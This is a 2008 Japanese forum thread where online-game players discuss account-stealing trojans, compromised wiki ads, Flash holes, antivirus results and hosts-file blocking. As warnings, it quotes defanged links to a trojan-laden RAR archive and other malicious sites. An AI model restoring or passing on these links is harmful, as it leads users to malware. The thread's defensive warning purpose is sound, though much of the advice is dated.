体験版があるなら仮想PCに入れて試すんだが

あの説明見る限り、OSに食い込むとも思えないどころか、nProのような
動作をする気がしてならない <> （○口○*）さん<>sage<>08/08/14 00:03 ID:7qBb8GBx0<> あやしいURL踏んじゃってカスペでオンラインスキャンかけたら
1個も引っかからなかったんだけどせふせふかな？ <> （○口○*）さん<>sage<>08/08/14 00:06 ID:mJwgxW/J0<> ん～とね、えへへ…

しるか <> （○口○*）さん<>age<>08/08/14 00:14 ID:EFjinR5E0<> もう日が変わったけど、13日は8月のWUの日でしたので、age
ttp://www.microsoft.com/japan/technet/security/bulletin/ms08-aug.mspx

緊急が6、重要が5とかなり件数多いので、忘れずに当てましょう <> （○口○*）さん<>sage<>08/08/14 00:19 ID:EFjinR5E0<> >764
カスペのオンラインスキャンで見つからなかった場合
「チェックした時点のパターンファイルでは発見しなかった」だけ。

パターンが更新された結果、後になって検出される事だってある。 <> （○口○*）さん<>sage<>08/08/14 15:07 ID:7tAUkugj0<> アトラクセンター入ると
ゲーム起動　　　ゲームを起動します。
ってのがもう書いて有るね。

bt_function_01.jpgはまだ見えないけど、
ゲーム
起動
になってる。

ブラウザログイン案外早く来るかも。 <> （○口○*）さん<>sage<>08/08/14 15:10 ID:BxZh7Tdf0<> ROじゃない他のゲームはブラウザログインへの移行が早い <> （○口○*）さん<>sage<>08/08/14 15:17 ID:UoWb0Riv0<> ログイン画面すっ飛ばされるようになると、蔵終了しなくても
別のワールドグループに移れるようになるのかな？ならないか。 <> （○口○*）さん<>sage<>08/08/15 05:50 ID:V1qjlKSB0<> ローグテンプレの一言情報の所に
ウィルスバスタがTSPY_GAMEOL.TO検出 SYSTEM32以下のLoveFly?.dll注意
と書いてあったのですがこれはどういう意味なんでしょうか <> （○口○*）さん<>sage<>08/08/15 09:00 ID:uZ9g+SNV0<> 悪意のある改ざんが見受けられたので気をつけてねと意訳
とりあえずTSPY_GAMEOL.TOで検索してください

ま、安全のためウイルススキャンかければいいよ。 <> （○口○*）さん<>sage<>08/08/15 09:12 ID:cCPPC2fx0<> ウィルス広告にでも当たった人がテンプレ自体が危険と早とちりして騒いでるんじゃ。 <> （○口○*）さん<>sage<>08/08/15 09:32 ID:cTAYtZn70<> ローグテンプレはamazonのはあるけどXREAの広告はないね。
でも、ちょっとあの書き込みだけじゃなんともわからんね。 <> （○口○*）さん<>sage<>08/08/15 09:52 ID:uZ9g+SNV0<> 「Windows Update」のエラー報告が急増中、原因はウイルス
http://itpro.nikkeibp.co.jp/article/NEWS/20080814/312758/

>「Windows Defenderで検出しても、『無視（Ignore）』を選択するユーザーは少なくないようだ」
道具を正しく使えないなら、導入しても意味ないんだよな。 <> （○口○*）さん<>sage<>08/08/15 14:14 ID:uZ9g+SNV0<> なんか面白そうなツールみっけたよ。セキュ対策や実験に使える？

http://dsas.blog.klab.org/archives/51301907.html
「WinAmulet」は Windows 2000 SP4 以上の 32ビット Windows 環境で動作するプログラムです。
次のような特長があります。
* 所定のフォルダへのアクセスを許可するプログラムを自分で指定可能
* 許可していないプログラムからのアクセスは報告・記録される
* 不許可のアクセス要求はプログラム側が意識しないまま透過的にダミーフォルダへリダイレクトされる <> （○口○*）さん<>sage<>08/08/15 17:28 ID:dnsGPZPL0<> XREAトロイ、深夜に更新されていたみたい。
ttp://www.virustotal.com/analisis/9eaa00549133a784be795e360dd56c9e
今回はNortonとBitDefenderががんばりました。 <> （○口○*）さん<>sage<>08/08/17 11:43 ID:qKsvi8mq0<> mixiに貼られていたもの。まず確実にアカハックと思われるので検体確認まではやっていません。
－－－－－

未知 2008年08月17日 01:05 %

【RO】ネカフェＤボス部屋に行ってみたhttp://www■cyokinde■com/gungho08/ro/10155326p■rar <> （○口○*）さん<>sage<>08/08/17 11:48 ID:qKsvi8mq0<> 8/15時点で、28/36が検出。カスペ検出名「Trojan.Win32.Inject.dzc」でした。

http://www.virustotal.com/reanalisis.html?6cd43268dfec1d169819246513b624cc <> （○口○*）さん<>sage<>08/08/17 13:31 ID:GFW+tZuu0<> ガンホー08ﾜﾛｽ <> （○口○*）さん<>sage<>08/08/17 13:40 ID:GFW+tZuu0<> ノートンに送りました <> （○口○*）さん<>sage<>08/08/17 14:20 ID:9BCSUhMQ0<> 今AVGって死んでる？
Binファイルが見つかりませんって出てアップデートできないけど、
自分のだけかな？
同じ症状になってる人いませんか？ <> （○口○*）さん<>sage<>08/08/17 14:29 ID:oSAflL8m0<> Ro内での取引でID,PASSを抜かれることはあるのでしょうか・・？ <> （○口○*）さん<>sage<>08/08/17 14:30 ID:qKsvi8mq0<> >>782
他のスレでもそんな書き込みを見ましたね。手動でファイル落としてきてアップデートかけてもだめかな？ <> （○口○*）さん<>sage<>08/08/17 14:30 ID:qKsvi8mq0<> >>783
原理的にありえません。（RO内ではID、PASSの情報は流れません） <> （○口○*）さん<>sage<>08/08/17 14:35 ID:oSAflL8m0<> >>785
そうですよね。ありがとうございます。 <> （○口○*）さん<>sage<>08/08/17 14:51 ID:9BCSUhMQ0<> >>784
手動でアップデートしようとAVGのサイトに行ったら、
何か物凄く重くサイト自体がなかなか開かなかったです。
何とかダウンロードしてアップデートはできたですが、こういうことはよくあるのかな？
とにかく最新状態にできたので一安心です。
ありがとうございました。 <> （○口○*）さん<>sage<>08/08/17 15:43 ID:qKsvi8mq0<> >>787
つまり、サイトが重い時は、アップデートに失敗するってことだろうに。 <> （○口○*）さん<>sage<>08/08/17 17:14 ID:bSUg7a190<> AVGは向こうがミスったようで、アップデート出来ない状態になってるみたいですね。
binが見つからないと出て、アップデート出来ない状況のようです。

セキュ板のAVGスレ
ttp://pc11.2ch.net/test/read.cgi/sec/1218168899/ <> （○口○*）さん<><>08/08/17 23:59 ID:+pq1ZTdH0<> >>779に書かれているURLから該当ファイルだけDLしたんだけど
書庫の内容確認だけなら感染しないよね？
ファイル解凍もexeの起動もしてません。

初心者な質問ですまんです <> （○口○*）さん<>sage<>08/08/18 00:17 ID:qtdIHVK/0<> そういうレベルの人は検体に手出すべきじゃないと思うよまじで。 <> （○口○*）さん<>sage<>08/08/18 00:25 ID:AR4uZqKx0<> >>791の言うとおり。なにをやったら動作するのかを理解できてない人は手を出すのが間違い。

内容確認（いわば書庫の一部を開いている）の為にどんな方式で展開したのか、
拡張子偽装ファイルではないのかなど考えることは幾つかあるからな。

自己責任で判断して、行動できるようになるまでは手を出すんじゃないよ。

# メモリに展開するだけで影響が皆無とは言いがたいからな。ま、まず大丈夫だが、保証はしない。
# 気になるようなら、ＯＳの再インストールでもやっとけ。 <> （○口○*）さん<>sage<>08/08/18 00:56 ID:WfybgSF80<> >>790
そんな絶対なんて事はない
rarとかだって完全なものじゃないんだから穴くらいある
書庫内容の確認を期待した物も存在するかもしれない
アクセスしたrar自体rarじゃないかもしれない <> （○口○*）さん<>sage<>08/08/18 01:08 ID:SdlmdywG0<> >>778の検体、McAfeeだとrar内を手動スキャンしないと検出できなかった。

ずっとMcAfee使ってたけど、カスペだとDLした時点でリアルタイムスキャンで検知してくれるのかな。
カスペのHP見る限りで実際はどうかってのはあるけど、
HPみてるとMcAfeeがいまいちコンシューマでは防御能力に不安が出る今日この頃…。 <> （○口○*）さん<>sage<>08/08/18 01:18 ID:AR4uZqKx0<> >>794
カスペはダウンロードしたのを書込む時点で反応したよ。その分、重い訳なんだけど。 <> （○口○*）さん<>sage<>08/08/18 01:34 ID:BQ+qPqUA0<> >>795
マシンによって使い分けてるな
DLを数多くこなすことが多いPCはカスペ
RO専用マシンはAviraを入れてる

あとどっかのスレで何も入れないってのがあったけど
危険アドレスを踏まなくても勝手にＤＬされる事があるとか判らないのかな
とかおもった夏でした <> （○口○*）さん<>sage<>08/08/18 01:35 ID:qtdIHVK/0<> >>794
マカはよく知らんけど、書庫内スキャンの設定か何かあるんでね?
ドマイナーなlzhと違ってrarはcabやzip並みに扱えんとまずいべ。 <> （○口○*）さん<>sage<>08/08/18 01:53 ID:qo/9E1CC0<> >>794
DLするか否かのダイアログが出て自分の意思で落としてきたファイルは
自分でスキャンかけんと

基本中の基本 <> （○口○*）さん<>sage<>08/08/18 01:55 ID:SdlmdywG0<> ID変わってるかも。794です。

>>797
手動スキャンには「zip他のアーカイブを精査する」ってのはあるけど（デフォはOFF：笑）
マカはリアルタイムでのアーカイブ精査はだめっぽい…
展開した時点で引っ掛ける自信があるからないのか、その時点で抑えればいいんじゃね？
っていうポリシーなのかは分かんないけど。
それ以前になぜ手動でもオフになってるんだろう、マカ。

>>796
exeとかを発動させるときにオンラインスキャナが検体に対応してると大体のアンチウイルスソフトはブロックできるんだろうね。
マカもそうだし。
問題なのはそのexeが多くのアンチウィルスソフトで引っ掛けられないいわゆる「ゼロディ攻撃期間」状態なのが問題なのよね。
いたちごっことはいえ、トロイ系はどこも対応が対症療法でしか対応できないのが現実だしね。

まぁ何より、今回猛威をふるってるFlashの脆弱といい、
多くのアドオンが致命的な脆弱があってもアナウンスだけのスキームで
プラグイン起動時にVerチェックやオートアップデートの構造を持たないのも問題だが。 <> （○口○*）さん<>sage<>08/08/18 01:59 ID:qtdIHVK/0<> IE(のActiveXコントロール)はcodebaseのケツにバージョン書けば
バージョンチェックして更新されるんだけど、
Flashをいまだに9,0,0,0とか書くのやめてくれｗ
ネトゲの公式サイトくらい9,0,124,0にしてくれ…。 <> （○口○*）さん<>sage<>08/08/18 01:59 ID:SdlmdywG0<> うわ、書いてみたら長文になってた。スマンorz <> （○口○*）さん<>sage<>08/08/18 02:11 ID:SdlmdywG0<> >>800
HP側で要求Verを書かなければ更新されないし、
古いVerがいつまでも残るから狙われるんだよね。

蔵側でプラグインが起動するときに自Verチェックして、
古ければプラグインの発行元から新Verをダウンロードできるように
すればいいと思うんだ。もちろん自衛も大事だけどね。
新VerだとHPがきちんと表示されないってなら鯖管理側も新Verで
HPを再構築すれば、旧Verは蔵も鯖もどんどん淘汰されるし。

ってネトゲの公式でもそんな実状なのか…。 <> （○口○*）さん<>sage<>08/08/18 03:24 ID:qtdIHVK/0<> YouTubeやニコニコで9,0,124,0と指定してくれりゃ被害は大分減る気がするなぁ。
ちなみにスクエニにコードサンプルも付けてメールしたことあるけどシカトされたｗ <> （○口○*）さん<>sage<>08/08/18 09:32 ID:rcG6v4J20<> どっちかっていうと、さまざまなプラグインなどのバージョンを調べて、問題があれば
警告してくれる外部ツールが欲しいところ。 <> （○口○*）さん<>sage<>08/08/18 09:35 ID:FZfUOutE0<> 【　　　気付いた日時　　　　　】 2008/8/18
【不審なアドレスのクリックの有無　】 ROの職WikiTOPページを表示したくらい
【他人にID/Passを教えた事の有無】無し
【他人が貴方のPCを使う可能性の有無】無し
【　　ツールの使用の有無　　　】無し
【　ネットカフェの利用の有無　　　】無し
【　　　 OS　　】 WinXP SP3
【使用ブラウザ】 IE7
【WindowsUpdateの有無】常に最新
【　アンチウイルスソフト】ウィルスバスター2008
【その他のSecurty対策】無し
【ウイルススキャン結果】カスペオンラインスキャンで「Trojan.Win32.Pakes」を検出
【スレログやテンプレを読んだか】 Yes
【hosts変更】無し
【PeerGuardian2導入】無し
【説明】数日前からログイン時にID/PASSで弾かれる事が増え、
不審に思いカスペオンラインで検索したところ該当ファイルを検出。
格納フォルダの内容は完全に把握しており、見覚えの無いこのファイルが不審なのは確実かと。
別PCから癌、RO共にパス変更。今のところ実害無し。HDDフォーマット予定

しかしマジで身に覚えが無いんだが…フラッシュプレイヤーもアップデート済みだし。P2Pも無し
尚、直接ファイルのチェックをしても、バスター様は華麗にスルーしてくださいましたｗｗｗ <> （○口○*）さん<>sage<>08/08/18 10:32 ID:AR4uZqKx0<> >しかしマジで身に覚えが無いんだが…フラッシュプレイヤーもアップデート済みだし。P2Pも無し

XREAの広告などに仕込まれた事例が上がっているので、怪しいアドレスを踏んでいなくても
導入ｗされてしまうことは十分にあり得るぞ。 <> （○口○*）さん<>sage<>08/08/18 11:13 ID:KLxoSma90<> バスターはザルだしROとの最近相性悪くなる一方だし、利点がさっぱりない <> （○口○*）さん<>sage<>08/08/18 11:43 ID:rcG6v4J20<> ノートン2009がどんな感じになるかちょっと気になっていたりする。
あとWebログインになるんだったら、nPro外して欲しいよな。 <> （○口○*）さん<>sage<>08/08/18 11:54 ID:qtdIHVK/0<> >>804
つ Secunia PSI <> （○口○*）さん<>sage<>08/08/18 12:05 ID:Z9Z1sx7y0<> >>808
ログイン方法変更でBOT（非正規クライアントのログイン）は
防げたとしても、チートは防げなくない？
nProないほうがうれしいけど代替になるモノでもないと思う。 <> （○口○*）さん<>sage<>08/08/18 12:05 ID:rcG6v4J20<> >>809
㌧
やっぱあるんだね <> （○口○*）さん<>sage<>08/08/18 17:33 ID:yDOXyFO/0<> >>797
lzhがドマイナーという言い方もどうよ。
少なくとも、M$がWGA特典としてExplorerのシェル拡張を配布しているくらいにはマイナーでは無いだろう。 <> （○口○*）さん<>sage<>08/08/18 17:37 ID:KLxoSma90<> その昔Lhasaというソフトがあってだな <> （○口○*）さん<>sage<>08/08/18 17:55 ID:TboMcQ1K0<> 日本のWindowsじゃ大きなシェアを持っていたとしても
世界で使われている率、という点ではlzhはマイナーだと思うよ
zipとかtarとかrarとかもあるし <> （○口○*）さん<>sage<>08/08/18 17:57 ID:cMi1O6dy0<> それをここで議論してどうするｗ <> （○口○*）さん<>sage<>08/08/18 19:42 ID:BQ+qPqUA0<> >>805
8/18に接続したかどうかが鍵かな？
どこの職Wiki見たか覚えてないかな？

レンタルサーバー・ドメインレジストラ業者のデジロック社運用の
XREA（無料プラン）を利用してた職Wikiは以下のものがある
・雷鳥Wiki/拳聖Wiki/Common Wiki

改変騒動時雷鳥とCommonは無料から有料に移行している
後現在無料サーバー以外のXREAでも改変騒ぎが起きている。

（同社上位サーバーのCORESERVERでは改ざん等は起きていない事を付け加えておく） <> （○口○*）さん<>sage<>08/08/18 22:25 ID:dLiIuyUB0<> >816
ブラウザの履歴から辿れるんじゃね？

それと有料鯖でも改竄騒ぎが起きてるのなら、上記以外の職Wikiも
やられてるって事か？
xrea使ってるROの職Wiki系では、今のところ被害報告はないようだが…… <> 805<>sage<>08/08/18 23:43 ID:UZ/cdEpgO<> 携帯から失礼。ちょっと説明不足でした（汗
発見したのは今日ですが、問題のファイルは8月6日作成になってました。
なので、実際に踏んだのはそれより前だと思われます

開いたページは拳聖Wiki、クルセWikiのトップ、狩場情報、ROM776、2ch、LiveRO、ちぇき14歳、くらいか… <> （○口○*）さん<>sage<>08/08/19 00:34 ID:Gif/9F5+0<> >>817
XREAには有料サーバ・無料サーバというのはありません。
有料・無料は広告が突っ込まれるかどうかという設定上の違いしかなく
同じサーバに同居しています。
有料だから改ざんされないということではありません。

…という趣旨の書き込みを何箇所で見たな。

# CORESERVERがどうかは知らない。
## 前回の広告改ざんの時は無料だけやられることになったけど。 <> （○口○*）さん<>sage<>08/08/19 01:00 ID:cjQ8oA9c0<> >>805
パス入れた後不正対策やサバーとの・・・
とかでるのバスターのせいだと思ってたけど垢ハクの可能性あるのか

チェックするか
バスター使えないんだな；；更新するんじゃなかった <> （○口○*）さん<>sage<>08/08/19 01:08 ID:on7xr7dI0<> >>820
○○を使えば大丈夫ってことはないので、そこは勘違いしないように
どんなウイルス対策ソフトを使っていても、検出しないことはある <> まとめ臨時 ◆kJfhJwdLoM<>sage<>08/08/19 05:24 ID:QuFZhRfh0<> >820
自分のも先週のメンテ明けから
「不正対策が更新されました。クライアントを再起動してください。
　OKボタンを押すとクライアントが終了します。」
とキャラ選択画面に戻ろうとした時や、それで落とされた後で
ログインしなおしても何度も暫く同じメッセージが出たりします。
サーバーキャンセルもしやすくなったみたいですが…
夏休み効果なのかどうなのか…。
カスペ、バスターでは今のところは検地しませんでした。

いちおう公式からはこういう事もあるのでチェックしてくださいとの事。
http://www.ragnarokonline.jp/news/information/notice/item/7732

PG2がPerlで動くプログラムなのか判らんのですけど、
もしそうならソレも引っかかるようになったって事なのかな…とか思ったりも。
フリーソフトの常駐時計が引っかかってる可能性のほうが大きいと思いたい。
それらでもないとしたら…。 <> （○口○*）さん<>sage<>08/08/19 05:42 ID:tQAWC7Bu0<> 困った事に、そのメッセージはキャラセレ鯖が落ちているだけの場合も表示されますね。
キャラセレ鯖が一斉落ちした時などは、鯖落ちスレがそのメッセージの愚痴で埋まります。

私も頻繁ではないですが、数ヶ月前くらいからキャラパス入れた時にエラーが出ることが増えましたね。
ギルドメンバー全員もそうとのことなので、nProとかも関与してるんでしょうけども。
あまりに頻繁に出る場合は何か怪しいですが、たまに程度なら気にしなくてもいいのかもしれません。 <> （○口○*）さん<>sage<>08/08/19 05:51 ID:Lw2LpBJq0<> >>819
XREAについてはそれで正解。
CORESERVERに関しては現在スパムブログ以外の報告はない。

前回の改ざんはXREA無料サービスに使う「広告鯖」が汚染されたから。 <> （○口○*）さん<>sage<>08/08/19 06:13 ID:wk0EIljo0<> >>822
PG2入れててもROが起動するところを見ると違うみたいですよ。
POPFile（スパムフィルター）のようなものが起動していると、ROの起動自体が失敗し、Ragexe.exeが強制終了されます。 <> （○口○*）さん<>sage<>08/08/19 09:25 ID:ZNnYPXj00<> ActivePerl 5.8.8.822 を入れてるけど、これが動いても落ちないよ。
だけど、Socketで何かしてるのを動かすと、ROが強制終了する。

Perlで通信しようとするとダメなのかな。 <> （○口○*）さん<>sage<>08/08/19 11:36 ID:fiPtfLAJ0<> 通信しない Perl Script を Apache経由で叩いたときにROごと落ちた気がする。 <> （○口○*）さん<>sage<>08/08/19 11:40 ID:KE9QBwec0<> Perl対策が入った当時はコマンドラインからperl --helpとか叩いただけでROが落ちてたな。
少しは改善されたのだろうか。 <> （○口○*）さん<>sage<>08/08/19 12:30 ID:Gif/9F5+0<> notepad.exeをperl.exeに名前変えて起動したら落ちたりして <> （○口○*）さん<>sage<>08/08/19 12:31 ID:26EGMEDi0<> Avira AntiVirスレに気になるのが

209 ：名無しさん＠お腹いっぱい。：2008/08/19(火) 12:21:20
TR/Onlinegames.ANPVってのが数箇所検出された。
オンラインゲーム関係？

俺もAntivirだから怖いんだけどどういう奴なんだろう・・・ <> まとめ臨時 ◆kJfhJwdLoM<>sage<>08/08/19 18:21 ID:BMITEO/x0<> >>825-829
単に夏休み＆お盆効果でキャラセレが重いだけで落ちている…だといいのですが。
ゲーム起動毎に一回は起きているような頻度なので何ともいい難く。

hosts対策済みでPG2にも報告にあったXREAに仕込まれていたIPは
PG2のログをみても出てこなかったので、それ関係は大丈夫かなあと思い込みます。

でも、とりあえず公式が薦める方法としてPC自体を推奨環境にするとか
クライアントの再インストールがあるので再インストをやってみる事にしました。
再インスト前にチェックディスクとかカスペやらも。 <> （○口○*）さん<>sage<>08/08/19 20:56 ID:cjQ8oA9c0<> ウィルスバスターのなおったかも
めずらしく１回で入れた <> （○口○*）さん<>sage<>08/08/19 21:23 ID:wk0EIljo0<> >>832
他のスレでは、直った→やっぱりダメぽいという報告が上がっていた。
バスター2008落ちの頻度は落ちたかもしれないが、根本的な解決にはなってない模様。 <> （○口○*）さん<>sage<>08/08/19 21:24 ID:KE9QBwec0<> そもそもGameGuardは更新されてない <> （○口○*）さん<>sage<>08/08/19 21:52 ID:wk0EIljo0<> サーバー側のタイムアウトの設定次第でどうにでもなりそうな気がするよね。
一定時間nProの通信が遅延した時に落とされる挙動に似てるし。 <> （○口○*）さん<>sage<>08/08/20 14:46 ID:/ppJA0/h0<> URLをコピペしたら悪質サイトに――乗っ取り被害が続出
http://www.itmedia.co.jp/news/articles/0808/20/news033.html

Flash旧バージョンの穴をついている模様？
広告が汚染されている恐れありと。 <> （○口○*）さん<>sage<>08/08/20 19:51 ID:zv6iwY1Z0<> なんかどっかで聞いたような手口だなw <> （○口○*）さん<>sage<>08/08/20 19:53 ID:qw1npiVi0<> おっと、xreaの悪口はそこまでだ。 <> （○口○*）さん<>sage<>08/08/20 21:53 ID:7U+enijE0<> クリップボードはomanchinかｗ <> （○口○*）さん<>sage<>08/08/20 22:41 ID:bJPlFZqD0<> iswebのHPにアクセスしたら、こんなメッセージが。
なんか仕込まれて慌てて対策中なのかな？

｜iswebをご利用のみなさまへ
｜現在、インフォシーク iswebホームページサービスにおいて、緊急メンテナンスを実施させていただいております。
｜
｜メンテナンス中は、ページの閲覧等、ホームページサービスをご利用いただくことが出来ません。恐れ入りますが、何卒ご了承くださいませ。
｜
｜メンテナンスが終了次第、サービスを再開させていただきます。
｜ご利用の皆様にはご迷惑をおかけいたしますことを深くお詫び申し上げます。
｜何卒ご理解、ご協力賜りますよう、よろしくお願い申し上げます。
｜
｜楽天株式会社 <> （○口○*）さん<>sage<>08/08/20 22:49 ID:hwDm675n0<> infoseek系サイトは日中から死ぬほど重くなってたね
なにがあったのやら <> （○口○*）さん<>sage<>08/08/20 22:50 ID:ocskpuVl0<> http://pc11.2ch.net/test/read.cgi/hosting/1212395975/
絶不調なだけぽい？具体的な発表待ちかもね
警戒心があるのはいいことだけどなんでもそっちに繋げて変な噂は立てないようにな <> （○口○*）さん<>sage<>08/08/21 00:08 ID:DMgaznWt0<> >>836
クリップボードに何かをコピーするのは、通常の Flash の機能なのかな。
だったら最新版でも危ないかも。 <> （○口○*）さん<>sage<>08/08/21 01:21 ID:FlbbgweW0<> >>843

Macも被害ってところがポイントだな。
Flash・・・Adobeになってから脆弱性ネタ尽きないな <> （○口○*）さん<>sage<>08/08/21 01:39 ID:SKtkPG7N0<> 付随物に権限与えすぎたせいだな <> （○口○*）さん<>sage<>08/08/21 09:03 ID:QXG1WYWR0<> GUNGHO-1:211.13.241.0-211.13.241.127
↑先週のメンテで一部鯖のアドレスに使われてるらしいんだけどあってる？ <> （○口○*）さん<>sage<>08/08/21 13:35 ID:9StQCVqT0<> >>846
Loki/Iris/Fenrirがそのネットワークに収容された。 <> FFXI(仮)<>sage<>08/08/21 17:56 ID:NgLmkfQs0<> このブログは下記の理由などにより凍結されています。
規約上の違反があった
多数のユーザーに迷惑をかける行為を行った。

＼(^o^)／
今までご利用ありがとうございました。 <> （○口○*）さん<>sage<>08/08/21 18:28 ID:6QD73Xjk0<> host制限についての質問です

host制限されているドメインへの接続はIEファイヤーフォックス関係なく接続制限でしょうか？

あるアドレスを調べて危険度判定は出ませんでしがファイルをダウンロード可能と出てうっかりクリックしてしまいました
ファイヤーフォックスはアクセス不可と出ましたがこれはhost制限に対する動きと解釈でよろしいですか？
(そのドメインはhost制限に追加されていました）

普段から危険アドレスやドメインをチェックしてましたがこんな初歩的なミスをするとは情けないです

ご存知の方は書き込みお願いします <> （○口○*）さん<>sage<>08/08/21 18:32 ID:kJubNWyM0<> そだよん♪ <> （○口○*）さん<>sage<>08/08/21 18:41 ID:z8nMY2JB0<> 複数のアカウントを持ってて、全て同じギルドに入れてるんだけど
今日夕方頃狩りをしてたら、狩りをしてない方のアカウントで
「ギルド員、○○（キャラクター名）が終了しました」「ギルド員、○○が終了しました」……と
一つのアカウントの5キャラ全て、一定の間隔で終了メッセージが出た。
あわててそのアカウントに入って確認したけどお金もアイテムも取られてなかった。
とりあえず5キャラともパスワード変えて、別アカウントもパスワード変更したけど、
これってやっぱり垢ハックだろうか、それとも今日ガンホーが裏でやってた更新に関係することだろうか。 <> （○口○*）さん<>sage<>08/08/21 18:43 ID:n5talm7d0<> >>851
いい確率でアカハク業者の下調べだな。 <> （○口○*）さん<>sage<>08/08/21 18:52 ID:kJubNWyM0<> >>それとも今日ガンホーが裏でやってた更新に関係することだろうか。
RO関係ないだろ、頼むからあれこれ混同すんなよ <> （○口○*）さん<>sage<>08/08/21 18:53 ID:5flilgQ20<> >849
hostsに 127.0.0.1 hogehoge.com な形で登録されてたのなら、ブロック出来てる。

>851
パス変えるのはいいが、その変えたPCが汚染してる可能性は無いのか？
もしトロイがそのPCに居るなら、変更したパスも中華に筒抜け。
それどころか、警戒されたと向こうに教えたことになるから、即ハクりにくる可能性もある。

もし安全と確信できる環境から変更したのでないなら、要注意。
急いで安全な環境から再度変更した方がいい。 <> （○口○*）さん<>sage<>08/08/21 19:01 ID:6QD73Xjk0<> >>850さん
>>854さん
ありがとうございます

hoetsにはその様に追加されていました
（リネージュ資料室さんのリストを定期的にhostsに更新しています）

念の為ににカスペでフルチェック中です
初歩的な質問にお答え頂きありがとうございました <> （○口○*）さん<>sage<>08/08/21 19:12 ID:uraqEDmg0<> PG2を導入しようと
「Software translated into Japanese: 日本語化ソフトウェア」
のページの
「PeerGuardian 2 for Windows β6b 日本語第2版 2000・XP・2003用」
のリンクをクリックしたんだが、リンクが死んでる様子
Operaで「リモートサーバーが見つかりません」、IEでも「ページを表示できません」と出る

他に配布してるサイトない？ <> （○口○*）さん<>sage<>08/08/21 19:22 ID:GPqpS/k50<> 「PeerGuardian 2」でぐぐったTOPからも落とせた訳だが…確かにそこは500エラーで落とせないな。 <> 851<>sage<>08/08/21 19:24 ID:z8nMY2JB0<> >>852 >>853 >>854 ありがとう
アカウントハック前提に対処することにします。
まずは汚染されてない（はずの）ＰＣでパスワード再変更かな。 <> （○口○*）さん<>sage<>08/08/21 19:24 ID:SKtkPG7N0<> >>856
www.archive.orgにそのダウンロード先のURLを突っ込んで
キャッシュから拾える。
8月上旬からダメになってるようだ。↓参照
ttp://www.geocities.jp/ff11warning/pg2/install.html <> （○口○*）さん<>sage<>08/08/21 19:26 ID:uraqEDmg0<> >>857
>>859
ありがとう <> （○口○*）さん<>sage<>08/08/21 19:44 ID:GPqpS/k50<> >>858
それがいいと思う。あと、危険と思われるPCの再インストールと平行して、汚染されていない筈のPCのチェックも忘れずに。 <> まとめ臨時 ◆kJfhJwdLoM<>sage<>08/08/21 19:59 ID:c2RRtHjm0<> >>848
そんな、いったい何がッ！素人にも判りやすい解説で
あの罠情報は有用であれ迷惑って事はないと思うのだけど…。

規約のほうで何か引っかかったのか、
それとも頭の沸いた業者らへんがメールでも送ったのかな…。
FC2も酷い。

今までありがとうございました。 <> （○口○*）さん<>sage<>08/08/21 22:02 ID:hMJ9V7ik0<> 告知突っ込めスレより転載

公式とXREAで運用されてる職Wikiで共にPHPのエラーがリモートで出てしまっている。
ttp://gemma.mmobbs.com/test/read.cgi/ragnarok/1218845613/227,229

Wikiのほうは現在その手の問題は出ていないが時々link.php関連の処理で問題が出ている
ドメインを付与しているので情報だけを書き出すと s261.xrea.com
ドメイン末尾はinfo <> （○口○*）さん<>sage<>08/08/21 22:06 ID:5WU8YZr80<> permission denied で fopen 失敗とは穏やかじゃないなぁ。
ファイルの所有者変更されてたりしないかね。 <> （○口○*）さん<>sage<>08/08/21 22:44 ID:qL1f4lr/0<> >>863
過去何十回もその表示を見ているんだが・・・ <> （○口○*）さん<>sage<>08/08/21 23:10 ID:hMJ9V7ik0<> Warning: preg_match_all() [function.preg-match-all]: Compilation failed: reference to non-existent subpattern at offset 25 in /virtual/おそらくユーザー名/public_html/link.php on line 208

Wikiのほうがこれだな。
設置者がだめぽ過ぎ？ <> （○口○*）さん<>sage<>08/08/21 23:11 ID:lQSA1+hr0<> 向こうのスレのレスまで読まないと流れが掴めないかもしれないけど、要は、エラーメッセージが出力されること自体が
問題視すべきこと。
恐らくは、php.ini内でdisplay_errors = on の設定がなされているか、index.phpでini_setが行われているのだと思われるが。
PHPの大本営でも、本番環境では上記項目をoffに設定することを推奨している。
ttp://jp2.php.net/manual/ja/errorfunc.configuration.php#ini.display-errors <> （○口○*）さん<>sage<>08/08/21 23:24 ID:hMJ9V7ik0<> XERA？
ttp://www.mmobbs.com/uploader/files/5436.jpg

公式(8/14・何処かの質問スレ用のもの）
ttp://www.mmobbs.com/uploader/files/5399.jpg <> （○口○*）さん<>sage<>08/08/21 23:46 ID:NgLmkfQs0<> うわ…エラー生で出すなよ…。 <> （○口○*）さん<>sage<>08/08/21 23:55 ID:UwhtdS5O0<> Wikiの方は管理人に連絡すべき事で、ここで書く事じゃないと思うが。

>867
php.iniって事は、xreaに言わないとダメなんじゃ？ <> （○口○*）さん<>sage<>08/08/22 01:45 ID:tSn0ThLt0<> >>862
暫定ですが、拍手でURI送りましたです。 <> RAGWalker ◆YimRag/CBY<>sage<>08/08/22 07:51 ID:5Cr1XtVn0<> おはようございます。
貧スレWiki管理人です

管理Blogにも書いてましたがこちらにも記載しておきます。

MLにてBSWikiの中の人から対象法などを教えていただいて
PHPのエラーメッセージをはかない様に対処いたしました。

半ば私のスキルのなさで起きた事なので精進致したいと思います。

あと、BSWikiの中の人が現在BBQの誤爆に巻き込まれているので
書き込みできないのでML転載という形でかいておきます。

> 【LiveROせきゅスレの件】
> 原因はriskystr.pl側に有ります。記述が間違っていたのです。
> 修正したのでriskystr.plを利用している方は最新のものに更新されるよう
> お願いします。 <> （○口○*）さん<>sage<>08/08/22 09:57 ID:GrAVodmM0<> 福建中華は最近はこういうテンプレコメントであちこち爆撃しているようだよ。
"【RO （日付）】ペンギンが戦場で挫折したようです。前編"
オリジナル文はニコ動のRO 5/11の奴だな、日付部分が7月とかになってる奴は中華の罠と思って間違いない。
書き込んでいるのは手持ちドメインgameicity。

気を付けてくれよな! <> （○口○*）さん<>sage<>08/08/22 13:23 ID:jMAsny7U0<> ゲームは違えど業者の動きをチェックできるからこういうとこも見てた方がいい・・・かな？
こっちはかなり業者が暴れてるっぽい。対岸の火事とは言えないね
●● RMT業者の垢ハックが多発している件37 ●●
ttp://changi.2ch.net/test/read.cgi/ogame/1219176652/ <> （○口○*）さん<>sage<>08/08/22 15:24 ID:tSn0ThLt0<> ネ実はいくつか前の既出だから見てる人は見てる。 <> （○口○*）さん<>sage<>08/08/22 17:03 ID:I/qlK6S40<> 【　　　気付いた日時　　　　　】先ほど
【不審なアドレスのクリックの有無　】有。himeyuz■exblog■jp
【他人にID/Passを教えた事の有無】無
【他人が貴方のPCを使う可能性の有無】無
【　　ツールの使用の有無　　　】無
